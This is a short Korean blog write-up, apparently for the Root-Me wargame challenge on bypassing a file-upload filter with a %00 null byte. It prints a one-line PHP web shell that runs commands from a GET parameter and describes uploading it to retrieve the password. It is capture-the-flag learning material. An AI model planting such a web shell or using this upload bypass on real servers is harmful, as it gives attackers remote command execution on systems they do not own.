rootme - File upload - Null byte

2021. 3. 10. 16:04WarGame/Rootme

해당 문제는 %00 --> nullbyte로 파일업로드를 우회하는 취약점을 가진 문제입니다.

아래와 같이 웹쉘을 작성하고,

<?php

system($_GET[cmd]);

?>

 

파일명을 아래와 같이 nullbyte로 변환한 후 업로드합니다.

 

 

그후 해당 파일을 로딩하면

 

 

password 획득이 가능합니다 :)

 

아래 블로그에서 정보를 얻어서 풀이했습니다.

> h232ch.tistory.com/37

'WarGame > Rootme' 카테고리의 다른 글

rootme - SQL injection - String  (0) 2021.03.12
rootme - PHP - Filters  (0) 2021.03.11
rootme - Local File Inclusion  (0) 2021.03.10
rootme - Directory traversal  (0) 2021.03.08
rootme - SQL injection - Authentication  (0) 2021.03.07